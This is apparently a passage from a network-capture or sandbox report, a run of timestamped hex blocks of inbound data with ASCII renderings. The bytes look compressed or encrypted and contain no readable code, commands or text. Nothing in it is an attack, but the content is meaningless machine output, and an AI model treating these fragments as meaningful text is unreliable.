                                                                                                                                                2022-09-29 12:50:05 UTC12730INData Raw: 11 07 fc ba 01 42 e1 4e 1d 05 53 a9 09 56 7a bd 7d bc ed 8c 3d 2d db 85 4a 62 db 64 e0 ea 69 db f2 60 17 30 c0 8d 07 93 21 21 7f 5f c4 a4 55 80 6e ef e9 b8 39 18 05 2a 44 ea ce 11 30 32 40 9a de 18 9a 98 80 a8 cc bc 78 a7 c3 d4 a2 13 4d 3b fc 6a 43 91 15 4e 8c e7 0a 53 3e 69 76 65 a0 fb da e5 a8 b9 fe cf 13 43 88 0a a8 9c 68 f9 4e 59 2f 40 e8 00 12 43 ca 52 78 0a 7b a2 6c bd b2 9c bc bb 31 3d 1b 1a 79 e7 a2 49 0f 52 d1 a4 f4 60 f4 0f 57 db 29 25 d4 be 41 49 7e 26 f3 0c 58 d7 50 2d 2b 5b a3 29 fc 38 48 28 09 34 2e 58 e4 9d 51 20 98 0f 26 63 74 04 1a 57 c0 65 5b 98 e8 1f ec bb 5d 19 d7 20 57 cb 52 8d a8 c0 8f c1 0b a0 37 a7 9d 51 88 b6 f5 56 c5 0c 8c c1 da 8a f9 77 21 0f 67 23 60 0e fe 35 47 39 24 e1 c9 80 54 3a 02 fd c3 db fb 9e e4 a0 07 d2 b1 7b 3d 6b 64
                                                                                                                                                Data Ascii: BNSVz}=-Jbdi`0!!_Un9*D02@xM;jCNS>iveChNY/@CRx{l1=yIR`W)%AI~&XP-+[)8H(4.XQ &ctWe[] WR7QVw!g#`5G9$T:{=kd
                                                                                                                                                2022-09-29 12:50:05 UTC12746INData Raw: 91 a6 c7 20 ed 0d 19 2c df 17 73 89 9e 28 ce 98 46 29 a1 39 75 6d 27 58 25 1c c1 94 1a b6 72 73 d0 bd ae c9 4d ca 8c f0 5b 1e 4d 7e 25 bc bc ee 24 4e f8 b7 42 a2 3d a7 6a 04 16 83 ba 07 09 43 61 f3 e0 d7 e4 2d 0e 08 31 09 5b 80 4e 5a fc d2 c1 09 20 ac 4d 37 70 b6 ea 38 af 48 d8 04 63 12 28 2d 8f 2b 42 a3 07 c4 9b ad d2 93 4b cf ac 7f 85 fc 82 1b db 9a 2e fa ee b0 e7 28 cb 2f 1e 2f ab ba 61 ad 7a 81 7d 6c b7 a5 ab 7e 10 b5 eb 5d ce b0 a5 eb f9 b2 68 75 58 d8 b9 76 75 fe 7c 5e a2 52 ed cf 40 15 c9 a8 2c f9 61 9c 23 47 fa 06 93 5c 56 f2 b0 88 86 38 ce 3c dd d9 e1 1b 4e d3 d6 ef 07 af 98 59 26 be 84 97 98 2d a1 39 97 8f d4 90 b9 37 b3 bd 9d 07 38 2c cb 82 93 01 02 d4 1d 8e 99 60 5a 89 1b e8 24 1a 1f 49 ff 01 a5 7f 12 e8 28 d0 c1 db 53 bf c7 f1 60 0b be b7 15
                                                                                                                                                Data Ascii: ,s(F)9um'X%rsM[M~%$NB=jCa-1[NZ M7p8Hc(-+BK.(//az}l~]huXvu|^R@,a#G\V8<NY&-978,`Z$I(S`
                                                                                                                                                2022-09-29 12:50:05 UTC12762INData Raw: 63 e5 a6 a4 c1 96 3a 84 48 5d 08 af cd 5a 2b 52 7e bf 6e c7 ad eb 76 38 75 9f 3c 32 a1 45 51 06 bd 96 a3 67 85 39 08 cc 84 9d d9 b3 ce 9d 53 2e be b6 dc 77 f0 e3 f6 c6 aa 1f 75 93 5e 30 5c b4 1d 5d 24 35 f7 04 49 fa cc 50 01 31 69 1f f1 f0 c1 81 c8 bf 6a 8d 85 94 0e 5f 7b a5 54 fa 53 e7 b2 84 e3 38 90 ea da 04 cc 89 b7 77 f1 11 bd b7 31 44 8d ca 6b c2 be b4 b5 13 2b eb f8 05 fd c0 d0 d9 d2 9b e1 91 61 bb 29 56 fc 75 80 05 bd 9f a0 68 b3 87 5c 5d 15 28 65 f9 90 ac 37 ef c5 b5 c9 d5 1d a4 36 8c 2b 35 4d 44 fa 09 0b 36 b9 69 7f 14 88 07 8f d4 12 49 da a6 d8 24 9e 50 5b 51 42 45 ca e0 d6 1e 2f 9b ee cd c7 2b db a9 ea f7 74 21 d5 c9 2d d2 1c fa ca 05 e4 81 86 6c 64 d7 99 32 60 ec d6 f3 28 c3 46 83 5d a2 c5 72 f3 1a 77 ed be 60 cf 18 33 69 38 51 af 2f 40 18 61
                                                                                                                                                Data Ascii: c:H]Z+R~nv8u<2EQg9S.wu^0\]$5IP1ij_{TS8w1Dk+a)Vuh\](e76+5MD6iI$P[QBE/+t!-ld2`(F]rw`3i8Q/@a
                                                                                                                                                2022-09-29 12:50:05 UTC12778INData Raw: 76 24 1e de f1 d4 ee eb 42 bd ef 75 68 02 dc 0b 33 83 49 98 08 66 26 24 07 33 63 a9 c1 94 bf b5 f5 a6 7a e6 d8 be 9c d2 fd ca a8 75 46 53 1d 85 a4 83 91 b0 34 e3 72 dc 26 72 8f 73 f2 ab 60 7e 40 0c 7e 7a f4 28 9e f6 4b fd bc b7 8b ed eb cd 02 1f bb 2c bc d3 5e a1 c7 f5 58 83 49 e0 8d 35 f9 ef 82 48 ec e6 bd a6 d3 85 00 2f 01 f5 34 a0 c9 c5 7b 57 e3 70 8f f1 4f 7c 85 ba 4a e0 49 7e fd 39 80 1c 29 94 f7 aa 98 2c f7 f7 79 f2 ef be d4 c0 3d ba a3 75 c5 f5 55 43 cf f3 24 7e 17 3a 71 5a 08 2a 85 1f 40 51 a0 60 04 58 65 e2 90 03 1d 23 d4 40 24 6c 6f 07 57 b0 7b 6d 51 28 e1 e6 98 64 3f 8e c9 91 f3 e7 59 4a 29 dd 47 d4 85 8a ef 75 b8 80 a0 f4 5a 76 e8 03 54 cd b7 96 ec 98 63 45 ef 34 44 a2 5b 03 fc 4b 45 ee 56 f5 cc 04 f4 62 53 27 de bc 73 6c 37 2d 0e 75 11 78 bf
                                                                                                                                                Data Ascii: v$Buh3If&$3czuFS4r&rs`~@~z(K,^XI5H/4{WpO|JI~9),y=uUC$~:qZ*@Q`Xe#@$loW{mQ(d?YJ)GuZvTcE4D[KEVbS'sl7-ux
                                                                                                                                                2022-09-29 12:50:05 UTC12794INData Raw: be 27 35 35 a5 1b 7b 59 07 f4 5e f0 e9 02 c9 03 20 93 f6 e1 b0 44 fb a1 d5 95 02 16 12 0b 7b d6 4b 78 1b bc 49 46 d7 fd b8 7f 3b 59 66 6b ee ce 6c f9 5b 61 a6 68 6c bc 62 0d fe 15 3f 4b b5 6f 16 11 45 0c e5 10 1e dd ac 4e 5c 93 b7 63 11 9a 8a b1 f9 8a fb 51 59 76 c3 5d 77 75 74 a0 3c 76 3c 2e 18 27 eb 14 9b 6d 8f 4e 0b 81 9d c5 57 76 db 47 a5 75 55 72 af 0b 4f 1d 92 99 3d 8b a7 41 9b 6f d6 88 d5 8d 52 20 01 1e cd fc 47 ee ac 65 77 d7 3b e5 a2 04 6e 03 ad d6 c4 8d e5 41 22 ef 6f 8e f9 3e 1f 10 8b a4 1a 66 65 96 34 6a 12 84 c0 d6 77 66 45 dc 14 f7 3f 9c 0b ab 30 00 aa 59 fc 89 2f f8 02 cd 84 ef 84 91 cb 9b e8 87 95 19 db 17 b2 92 bb 13 62 10 b6 1b 07 35 e0 f8 c8 e5 ca 61 3a a7 1b 78 dc 82 f1 15 fb 9e fb 33 0c af 59 37 b3 58 d3 da a5 3b a9 20 7a 60 ea 48 bb
                                                                                                                                                Data Ascii: '55{Y^ D{KxIF;Yfkl[ahlb?KoEN\cQYv]wut<v<.'mNWvGuUrO=AoR Gew;nA"o>fe4jwfE?0Y/b5a:x3Y7X; z`H
                                                                                                                                                2022-09-29 12:50:05 UTC12810INData Raw: ff 11 e5 fe 7b 09 6c c0 11 a5 d1 89 af f3 fa d5 aa a0 d8 25 51 ee 8e e3 93 bc 5f 21 4d b9 62 76 ea 37 f3 6f 2f ee 8b 91 d9 08 aa 46 0c 42 9e 3d 7f 15 63 d1 ac 05 5c 2b 58 99 7e c6 a1 9e ac 9e e1 87 63 21 88 23 87 91 75 b2 2c fc 06 c1 7a ca cf 47 fb f8 2f 30 be 6c 53 2e 46 29 6e ba 7b d5 b8 99 94 e4 8a 51 fa 48 98 ce 7c c8 ed 4a ae 0a f2 31 d7 2a b1 82 30 4d b4 88 e3 27 95 1e 78 ec 8b f8 84 a7 4f ec 42 04 e9 92 da 0a e3 fd a7 c1 57 9a 3a ba 92 a8 05 58 3f 94 26 d2 1f 72 e4 42 27 01 7a ff 15 02 fa 91 a5 71 ae 4a 75 42 1b ee a9 9b b7 b9 ee 43 6b ea ee 0c 26 e8 7e 7f d2 d3 75 59 54 7f da 25 32 19 55 6b f2 bb c5 26 bd fa 77 af 85 3a 22 ec ba 27 85 fa ee 53 57 eb 67 b2 0f e5 30 3a d6 ac a3 3b 2c a4 f4 61 41 36 8b f1 19 78 f9 60 95 45 97 f6 bd 93 64 39 cc 3f 6c
                                                                                                                                                Data Ascii: {l%Q_!Mbv7o/FB=c\+X~c!#u,zG/0lS.F)n{QH|J1*0M'xOBW:X?&rB'zqJuBCk&~uYT%2Uk&w:"'SWg0:;,aA6x`Ed9?l
                                                                                                                                                2022-09-29 12:50:05 UTC12826INData Raw: c3 15 24 2e b4 3e 06 c8 31 e3 a6 b7 ab aa 86 80 af ec 6e 39 28 25 31 56 83 00 17 c5 e0 cf 4f 52 c3 32 92 b8 7e b7 90 fc 76 a2 b5 e9 4d 71 3b d5 03 de dd 7f d3 14 ea 0e ef 26 bd d0 d3 a0 70 3d 46 d4 09 b1 d9 3b 5b 54 1e 77 e8 54 46 06 19 ee 82 25 ce ae 84 c5 36 cf bd 7b 2c 32 e3 ab 8b f9 53 20 96 17 a7 8a 01 6d e2 5a 6f 34 10 68 d5 6e 6a 70 33 e4 50 89 2d 7f 1b c6 6b be 41 58 ba 1e f2 06 66 01 07 a9 cc 2b f3 48 ff 69 eb b2 c2 11 d0 c8 af a2 3a f2 ff a6 94 14 ee f0 e2 cc 56 04 f3 e1 68 ce 87 a5 31 54 0f f6 c0 53 a7 9e de d9 79 d1 93 63 59 a6 60 09 49 ac 3d 62 ad 72 2a d7 c3 1a 49 39 38 d2 85 0d 0f de a2 1a 9a 5b b9 3d 6e f5 63 11 4b e2 d7 27 62 ff 06 9a 0e 8e 6c b4 73 64 2c 5c fd bd 2e 32 53 03 09 00 ac 8e 1f 14 fa d6 67 23 0f e1 4a 74 ad 7c 19 d3 aa ed 8a
                                                                                                                                                Data Ascii: $.>1n9(%1VOR2~vMq;&p=F;[TwTF%6{,2S mZo4hnjp3P-kAXf+Hi:Vh1TSycY`I=br*I98[=ncK'blsd,\.2Sg#Jt|
                                                                                                                                                2022-09-29 12:50:05 UTC12837INData Raw: e1 96 de d9 b8 1c f4 8e ae d9 c7 88 79 00 ff 60 c8 e1 fc 34 7c 45 53 67 42 6e fc 5c 70 e0 44 38 fe 99 9e 46 61 22 ef 51 63 e2 ec 2c 4d 2a dd da 0f c8 9c 3e 97 da a3 e1 c7 74 d9 57 b3 a5 98 f8 5f 09 8f fa 42 28 fe 19 96 80 0d b1 98 7b 6d 72 db af eb 1b 8e 7c 63 14 a7 67 e3 33 3f a3 07 f9 5f 5c 54 b7 9c 92 2a 6d 4b 46 c6 a0 e4 c6 54 99 ba 92 6c 43 e6 7d f6 f9 e8 e8 1d b1 c4 35 62 a6 61 86 29 d1 48 cf 2f b0 80 a9 22 29 25 ae 81 31 96 63 91 61 44 c6 77 54 1a 45 5e a3 e3 91 f6 ce 7f fb 84 61 87 36 38 a0 58 3e 69 46 12 83 f6 d6 cc 5a 15 d4 c5 2c 61 c2 c5 a8 b4 c2 ed c7 c8 8c e3 56 81 85 8c 01 85 f8 bd dc 82 95 4d 26 46 c6 93 1a d3 a3 1e f2 ab b7 b3 f4 1a 1c 3c 47 ca 3f c1 e3 0d 2d 8c b9 6c a8 b2 3f ff b0 6b 60 02 c4 19 65 d5 82 4c 5a 83 a9 cb 14 60 de c8 8f d5
                                                                                                                                                Data Ascii: y`4|ESgBn\pD8Fa"Qc,M*>tW_B({mr|cg3?_\T*mKFTlC}5ba)H/")%1caDwTE^a68X>iFZ,aVM&F<G?-l?k`eLZ`
                                                                                                                                                2022-09-29 12:50:05 UTC12853INData Raw: 06 5f 44 a7 2e f1 b2 6a 83 69 d5 21 17 5f d7 88 16 70 50 dc 0d bc 1a 41 36 18 c4 99 85 aa 8b 60 08 84 6d 4b 57 a1 66 db 65 39 9f 25 0d a8 51 44 39 f2 70 47 d4 08 92 cd d1 0f a1 e2 a6 12 6d 0d 40 98 fa 92 10 c6 e9 b2 70 1d d3 e7 b7 de fe eb 32 a2 95 a6 81 41 8e 9b 3b b9 49 49 d3 e3 5d ad de ab 8e 9d d7 30 64 89 c0 dd da 3b bb 54 64 ff d5 55 9b bd 6a 2b 3c 04 66 b6 f8 47 b1 66 63 00 18 8f c3 9d aa b9 18 e8 49 4c 09 cb 3b 88 b5 1a a2 a4 3d ab 8c ec 80 f6 11 52 b1 99 b1 1a 34 68 32 7b 3b be 3b 80 0a a3 ce 50 dd b1 17 07 05 1a e9 e8 b5 f1 57 5f 01 32 d3 93 54 e5 e2 43 bd b8 6d b3 d7 42 d7 db 92 67 4f d6 c1 5b 48 12 5e ae 27 29 f4 de 5c be 13 cd 7f e5 ea a3 c0 2d 4c 17 94 a6 67 d5 35 ea f2 b0 08 67 54 c3 10 32 64 44 21 3e d7 e2 fc b1 da bd 85 5f 18 ac 19 02 0d
                                                                                                                                                Data Ascii: _D.ji!_pPA6`mKWfe9%QD9pGm@p2A;II]0d;TdUj+<fGfcIL;=R4h2{;;PW_2TCmBgO[H^')\-Lg5gT2dD!>_
                                                                                                                                                2022-09-29 12:50:05 UTC12869INData Raw: 7c a8 7c 4b 8e fc 6a 0e b9 fc bb b4 9a be 12 e2 a7 9b 65 0a c7 c1 60 00 4e 96 b0 ae a7 7c 12 ad 49 48 55 35 bb f4 e5 3a 9a f7 d8 45 66 5b f0 f6 31 a7 42 2f ac 42 1f a5 43 9c da 53 bb a1 c5 30 4a f4 29 08 32 19 9e d8 5b f7 78 69 25 7c 72 fb a7 85 16 24 3f 6a 64 d1 5b 4c 90 80 02 8d b5 5d ac 0e 27 b6 36 eb c8 a6 f7 bb 13 3c 87 a5 2c 07 e8 91 71 d2 00 b6 8c ee ee 51 84 f3 76 bc 2f b8 e8 63 bc 6c 00 e8 7d 6a 7b 7d 26 a0 8d 04 75 cb d3 07 48 e1 2b bf 90 f9 84 bb c7 48 97 59 cd 94 d1 3f 99 a3 85 3f a2 4d 91 4f d5 5a d3 24 cf a5 d4 e8 fe 10 ea 3f a9 f3 a0 e8 1c 7d 2c ba 8f df 78 f4 d7 2c f9 8b 0b 6a da bf 0c d6 bb f5 d3 22 a9 a6 a1 18 ff fc 77 fd fc 68 38 27 d1 88 d8 b0 a5 6b 14 a0 04 ff 20 7b f4 6e 6a ff 73 e3 89 ff 35 ad 6f c9 f4 aa ad a0 10 90 3e cd 62 e3 17
                                                                                                                                                Data Ascii: ||Kje`N|IHU5:Ef[1B/BCS0J)2[xi%|r$?jd[L]'6<,qQv/cl}j{}&uH+HY??MOZ$?},x,j"wh8'k {njs5o>b
                                                                                                                                                2022-09-29 12:50:05 UTC12885INData Raw: 61 55 ac fa cb 5f 8c cf 4a 89 3b 80 d9 92 67 95 7b e0 f4 09 9f 2b 05 4b 8c 16 74 4b ec 21 3c 90 0c cd ec 3d 80 33 77 94 51 95 4e dd 4a 91 4d 58 4b cd 56 df 09 a5 8d 9c a9 f2 3a 62 d4 6e 2f 65 7c 0a b7 85 4c fd 3c c2 59 75 6c d4 7d 7c f3 ee bc cf b3 3c a5 1b b1 8e 49 31 39 6f 0d 23 06 a3 89 55 c0 8c 43 e5 ef 04 f2 ba 36 6b 7c 97 1f 7a d2 fa 94 2e 8a e0 06 8c f3 7a 09 5f ea 79 0d a2 8a ed 23 3e ed c4 bc cc 8f ae 22 8e 7a ab 50 f4 f1 da b5 ac bc 11 a7 11 4d a3 ca d0 ac d9 ae 40 dc 2c b3 9a e8 c1 c9 12 dd 4f 3b 2f 47 c6 93 a3 11 8d e3 35 a7 ac dd 40 0a 1e 53 45 0a a4 c5 f4 be 7b 9e 50 d6 bc ef d7 75 5f 74 67 f0 a2 a3 48 9c f1 ca 30 1c c9 bc 1d 2c 1f 2b 84 9a b9 f1 77 9d 8d 78 38 be fb 03 97 5d 63 c2 13 40 b9 7a 0f 70 5f ea 31 5f a9 6f dc bb d1 77 e7 c5 95 a4
                                                                                                                                                Data Ascii: aU_J;g{+KtK!<=3wQNJMXKV:bn/e|L<Yul}|<I19o#UC6k|z.z_y#>"zPM@,O;/G5@SE{Pu_tgH0,+wx8]c@zp_1_ow
                                                                                                                                                2022-09-29 12:50:05 UTC12901INData Raw: 4c 85 a8 62 2b 79 f7 76 cb 42 fa 0c bc 72 e2 54 8f c7 9c e3 45 db d8 c4 60 bd 95 5f 5d 83 32 69 2a e7 a4 24 6d d5 2a cc cc b4 ec 67 8f ed 50 48 c6 c5 42 cd 00 ae 30 09 81 2f 1a f1 76 e0 29 0d 3a b9 a2 c4 57 f7 03 ac 41 33 57 91 50 7b aa 2f 32 dd 9b b4 14 84 f1 a4 60 2b c6 03 f2 3c c1 bc f4 c8 90 9d 8c 8c 1f 02 09 1e 4f e6 33 3e 95 05 40 26 32 e6 d3 65 20 bd 31 a0 98 d9 d9 1b 7d 16 68 1f c0 78 9c 92 e6 91 17 6b c1 3b 96 5f 0b 40 e6 ed 37 b7 ba ff ed ef 1c d7 99 57 ca 74 02 f8 dd 2d f9 9e e5 00 38 14 f5 79 0d 35 d5 fb fe b6 84 8a d0 5b 8c 60 19 d8 4f b1 83 ae 49 92 ca aa f7 58 b9 6d 3b a4 c9 6d 01 ff fd ab 2f 58 36 96 1a 0a 57 98 a9 7a d7 f5 69 be c5 7e 62 62 73 b6 cd ac b2 b9 22 a0 9b 8b b7 f2 f2 77 48 86 5e 63 a7 55 44 f3 c6 ff 49 00 bc 92 80 33 0b 7f f9
                                                                                                                                                Data Ascii: Lb+yvBrTE`_]2i*$m*gPHB0/v):WA3WP{/2`+<O3>@&2e 1}hxk;_@7Wt-8y5[`OIXm;m/X6Wzi~bbs"wH^cUDI3
                                                                                                                                                2022-09-29 12:50:05 UTC12917INData Raw: d1 17 94 22 83 e7 0f 8f 7f 87 37 3e fa ba 05 65 5b 87 19 a0 f5 e9 8a 9b 5e e9 9d d0 96 6c b4 06 5d 83 fe c6 1f e5 1d 65 af dc c3 cc c0 cd 43 77 36 6a e0 24 40 f4 48 54 ff 16 d3 39 40 c6 83 d8 79 3c 53 9d f6 61 6b e7 83 66 a1 91 e7 fa e8 11 db ec f9 00 3d 86 7c 77 95 fe 8e 03 f0 0e 7d 3b c1 67 4c da 1b c1 74 03 a1 57 5f 59 d4 8a 15 fb f5 37 18 79 19 4c df 5f 24 4b 8f 54 b8 bd d8 1d 80 9c d0 19 59 fe 5d 01 58 8a ce 3a 19 39 3d cd 0d c0 6b 69 12 e0 9c 96 dd e1 68 62 6b 08 fb 5b 62 ed 6f 94 e1 e7 1d 48 12 35 88 b4 9e 93 bf 00 e7 58 66 28 ae b5 2e 60 ca 6e 98 75 53 7c 5f 52 fc d5 dc 1d 8e ac 45 ea 02 11 c6 a4 66 bd f6 f4 66 f8 f3 d4 55 28 c9 93 be 35 c3 ee 8b 04 9d d6 10 e4 14 70 5c fe ae 5f 3c e1 bf 21 81 ad 57 fe cd ba e0 2b f1 11 6e 7a af e6 4a 6f fd 0b 41
                                                                                                                                                Data Ascii: "7>e[^l]eCw6j$@HT9@y<Sakf=|w};gLtW_Y7yL_$KTY]X:9=kihbk[boH5Xf(.`nuS|_REffU(5p\_<!W+nzJoA
                                                                                                                                                2022-09-29 12:50:05 UTC12933INData Raw: 05 e8 ae a6 e6 9d 78 34 0e 91 6c f0 43 27 ba 8b 35 58 06 8d 82 c7 2a eb 9d d7 58 07 f0 03 88 9b 28 24 fa 5b 6c d5 28 10 40 86 bc fd fb ab 54 e2 17 7f 81 55 d4 4e e7 ca e4 9e 88 98 9c 30 39 ff f7 da 57 33 01 44 c0 83 c5 4d ae 22 ca e7 18 5b de 34 6f 9e c2 95 16 81 97 f3 b3 3c d8 4e f5 f9 1a a4 c6 54 f1 78 22 c4 9c af 70 b7 27 e7 c9 85 38 88 ef 89 0b 2b fa 15 ad 1e c2 c8 b2 4d 8b d6 bc 9a 97 67 57 61 6e b9 43 e6 cb 97 19 d8 b2 88 d6 0f a5 c4 f4 e1 46 35 c2 fc a4 f9 33 54 b9 46 50 9c 3b 39 fe 7c 0e 9a 6a 13 23 72 48 f5 e1 07 a2 ad 71 d9 25 11 e6 dc 65 79 2f 70 1a 14 9c 60 8f 55 78 6b b3 f3 2b c9 87 85 ad c7 57 21 69 d2 d1 79 00 35 03 6b 85 a2 6e ad ce b1 3d 11 84 ca 60 61 a1 c8 26 ff df 70 b4 f4 d4 3f 28 01 5a 3d cd bc e2 17 36 aa e5 dd d9 57 b7 48 9a 12 89
                                                                                                                                                Data Ascii: x4lC'5X*X($[l(@TUN09W3DM"[4o<NTx"p'8+MgWanCF53TFP;9|j#rHq%ey/p`Uxk+W!iy5kn=`a&p?(Z=6WH
                                                                                                                                                2022-09-29 12:50:05 UTC12949INData Raw: 49 04 ac 23 6b 44 49 9e ec 98 ab 7e 7d e3 61 3d 12 45 be 0b 5b a7 6d 02 c1 bb 56 1f 54 b6 5c c3 f5 8a 33 51 99 81 91 82 b9 ce e9 8f a4 ac 16 79 b6 78 59 fb cb 53 f2 7f ae b8 99 d8 d6 22 7d fd d1 8b cf e8 fc d7 da 19 17 80 19 4a 31 25 f7 4c 1d 1b 1d e8 29 b8 1c f0 d9 41 82 ab 5b e9 5b a8 cd f9 61 63 ef a6 ee e6 43 ca a3 15 4a 38 c5 8d b6 37 19 d3 e6 09 56 fe 07 40 e5 f5 6b ae 69 eb ac 5c 25 51 15 16 36 de 02 14 52 2b aa dd 38 ea 6a 5c 46 f0 94 9a 5f 9c 69 52 91 fa 11 bd b1 55 24 98 b6 84 e3 31 2c 48 ae c7 fe 13 5d 1e 31 eb 06 6e 79 ed 68 8d a7 28 0d 9c b8 5e f2 8d 20 69 2e 59 af 20 2f ca aa 19 0d 6c 88 e6 11 7e cf e2 2e 36 93 4f c4 7f 96 3a ea c9 a8 22 47 77 de 2d ee d1 9c 25 e4 ec ab 96 9f a2 e2 27 05 24 45 80 1d c1 a9 96 0e c4 e1 83 bd f6 5d 71 35 0b 44
                                                                                                                                                Data Ascii: I#kDI~}a=E[mVT\3QyxYS"}J1%L)A[[acCJ87V@ki\%Q6R+8j\F_iRU$1,H]1nyh(^ i.Y /l~.6O:"Gw-%'$E]q5D
                                                                                                                                                2022-09-29 12:50:05 UTC12965INData Raw: ab bd 6b ff c7 de 83 37 d5 e8 85 65 25 47 ae dd 89 18 8c 6d 8e 83 57 bf d2 01 42 c3 c4 35 53 9e 89 35 9c 9b 84 08 dd 90 06 0c 22 18 1c e2 72 c6 a3 8e b8 c3 7b 37 49 cc e7 e9 29 72 9b 83 6b 2d e7 29 22 24 68 1a 24 c6 d7 7a ed 77 a5 da ab 26 90 d4 62 8c 7a 9e 38 44 c6 68 02 e1 00 19 c9 52 2b e2 7a 74 15 bf 42 30 45 00 2a 62 e1 1d a3 22 31 2a 35 1a 68 e7 10 f7 8d 3c c6 10 2a 80 0d de af d7 fb eb b1 32 19 34 ce 27 0c f1 32 d1 bd 3a dd 66 f7 a2 b0 51 40 65 f3 59 59 6b a0 45 e1 d5 76 a8 33 1f 16 16 60 6a d1 55 f8 2d 0d 6a 3e a8 94 bd e1 b5 1b 13 14 47 1f 3f bd b3 2a 79 e2 c2 ca e0 32 ab 56 22 4b 7b 5b 15 74 a2 94 df 3a 3d 7f b3 14 4f 43 95 44 1a 96 34 3c 6e 98 55 69 7b 68 e3 e1 29 2f ca 6a 72 6d ef 3d 45 76 28 e9 15 cb 9b bd 94 1d 08 22 22 58 6e 2f 33 cf ed 98
                                                                                                                                                Data Ascii: k7e%GmWB5S5"r{7I)rk-)"$h$zw&bz8DhR+ztB0E*b"1*5h<*24'2:fQ@eYYkEv3`jU-j>G?*y2V"K{[t:=OCD4<nUi{h)/jrm=Ev(""Xn/3
                                                                                                                                                2022-09-29 12:50:05 UTC12981INData Raw: 79 60 1b 5d c0 ec f2 be b9 18 ee b1 e9 68 3e 23 dc 8d c8 4e 76 69 77 52 f0 70 d7 a0 f4 29 cb fe c5 68 ab 49 06 2f af 9a ca 94 a9 9c 8c 40 91 be fe 40 fd c4 1e 9a 86 cc d6 d7 72 b5 28 ef 45 20 75 d7 be e5 09 1d 2f 1b be 81 b6 36 d4 9c 4e 79 a3 9a d6 30 f4 a7 d2 e6 bb ff d5 c4 c5 18 ba 4b ab fb 42 1d db 20 17 4f f4 bf e0 19 77 e6 ef aa a9 12 aa da a5 66 b0 35 e0 46 a9 cb 09 78 80 de be 96 4f 9d 49 1b 50 6b 6d ba ad f0 af e9 3f e8 e5 5e b0 3e c5 2a 70 23 0f 7f d5 46 f5 11 56 f5 0d c2 d9 63 63 d7 68 d9 ad b5 2d 1a 23 4f 40 a9 cb 3f 48 01 fa a5 02 74 14 ac d7 c2 7d b9 00 08 1c 9f 82 f2 1a 19 0d 9f 9c e7 57 8a df d9 71 8c 35 9d 11 e9 05 5a ac e4 6d a9 b9 d0 e5 bc e5 cc b1 e5 aa 83 58 6e d9 fd 4f f1 99 aa af c3 ce ec da b3 7a 0a ca 1d a5 13 9b 2d 20 bc 0d 20 d2
                                                                                                                                                Data Ascii: y`]h>#NviwRp)hI/@@r(E u/6Ny0KB Owf5FxOIPkm?^>*p#FVcch-#O@?Ht}Wq5ZmXnOz-
                                                                                                                                                2022-09-29 12:50:05 UTC12997INData Raw: f3 b7 4c 17 62 bf ce c1 b8 be 65 8d ca f0 f9 03 49 73 01 a7 6d f4 07 5a 5c 71 fb b0 5d 69 46 ef d4 9a fe e7 15 3b 65 e6 20 ea 1d ae 9b d1 5f 28 23 4f 61 a3 41 c6 d3 69 d1 76 2e a5 8b e3 06 2c 4b 0f 27 42 b4 ec 01 68 15 7b 74 6d 86 b7 3d 31 ba 19 dd 9a 69 46 bd 4f 8c cf fc 07 40 79 6a ef e5 8c 32 f0 50 35 7c f2 fa ca 18 79 1d 5a 48 5f 08 27 f6 c7 ac 78 39 99 df dd db d7 f8 62 f7 1d 25 25 72 4d 43 fb 3e f6 17 19 ac 0b bd 41 5d da 9a 3e 61 7f dc d4 0d f7 f3 2d 85 e9 2a 26 75 a4 70 cd ba 62 e2 67 de af 45 53 e0 5b 33 63 82 e1 44 e1 04 c8 60 a3 bd 12 bf 65 14 17 9c 2f 92 0a 38 b1 39 fc 01 77 12 2b 60 7c 3b 70 81 ea 0f 43 62 67 9e 98 56 51 72 df 16 b2 24 2f 52 8e 76 96 67 d4 09 e2 38 cc 6e 54 7b 76 0c 7f 53 ca 5d 9c 5b 57 aa a8 9d 1a c5 ea 00 13 09 1d 6e 41 bf
                                                                                                                                                Data Ascii: LbeIsmZ\q]iF;e _(#OaAiv.,K'Bh{tm=1iFO@yj2P5|yZH_'x9b%%rMC>A]>a-*&upbgES[3cD`e/89w+`|;pCbgVQr$/Rvg8nT{vS][WnA
                                                                                                                                                2022-09-29 12:50:05 UTC13013INData Raw: 08 9b a9 93 05 36 05 82 d5 d2 2a 8b 22 c3 67 9e 9a 9f 0b a9 b0 64 a1 f3 e7 59 32 e3 f7 3c 09 d5 a5 fa c3 c1 25 b9 b6 3c b9 75 b1 4f 35 55 9b 3d e7 51 35 ec d1 59 ce 2d 2e 10 6e 75 25 33 de 06 ba 24 67 54 2e 80 d8 88 32 b8 07 74 ae f2 b4 57 67 31 54 c9 63 f1 0c 9e 38 b6 26 69 25 da 5c d8 5d e1 ed 03 a1 61 90 9a 4e 46 83 a5 72 75 20 38 32 6a 97 87 04 41 a6 1f f5 36 76 2a 91 ed 20 74 b3 af bf ac 08 d4 70 39 19 aa 5a 59 63 78 46 d4 82 7a 73 02 53 27 8a e2 5d b0 e7 07 b0 f8 5a 6c db 42 da 04 c3 b8 22 fd d2 f5 1f f8 0a 7e cb a3 f0 f3 ca 4d 5a 81 48 66 f1 f9 72 58 b8 f5 3f 75 1b 10 5f 79 0c 22 ee bf dc b2 bc 3b 2f 73 22 27 d7 33 3f 8f a6 78 fe 02 79 ca f7 6f 31 74 e6 fc a3 64 f3 a2 cf e0 5d b3 5b 68 5a ae 38 f9 f2 a8 12 00 5d f8 3b dd b5 cd bb 17 6f f0 2f 0a 80
                                                                                                                                                Data Ascii: 6*"gdY2<%<uO5U=Q5Y-.nu%3$gT.2tWg1Tc8&i%\]aNFru 82jA6v* tp9ZYcxFzsS']ZlB"~MZHfrX?u_y";/s"'3?xyo1td][hZ8];o/
                                                                                                                                                2022-09-29 12:50:05 UTC13029INData Raw: 6f f3 33 40 b5 1d 38 60 93 0a e7 68 5f a3 7d 54 cc aa b3 10 77 53 97 fb 71 cd 31 16 07 48 af 68 1b 87 c3 39 d8 45 5d 55 53 1b ee aa 94 eb 07 ec 8a 52 3e c8 c3 f8 23 a9 4f 14 76 4e c1 cb db ab f8 4d e0 48 92 59 b8 35 a5 02 c9 74 a0 53 cb e8 20 61 5e c5 00 ad cc 41 3d 56 cc ea 23 48 c4 57 c5 ff 72 01 28 1b 39 1f aa e5 9d 44 20 bd 74 dc 17 4d 0d 35 93 95 ea 0c ab 5d 53 60 d0 72 7f 47 17 d3 27 f9 fe 53 2f eb 66 2c bb 6e 23 ee 64 b9 53 b9 20 ed bd 0e f7 65 b3 46 d7 5e be 1c 65 44 3f 8b 96 11 4b d3 e1 70 cf cd ae c5 73 02 ba cf 02 17 9e 67 89 7b c6 c8 9d 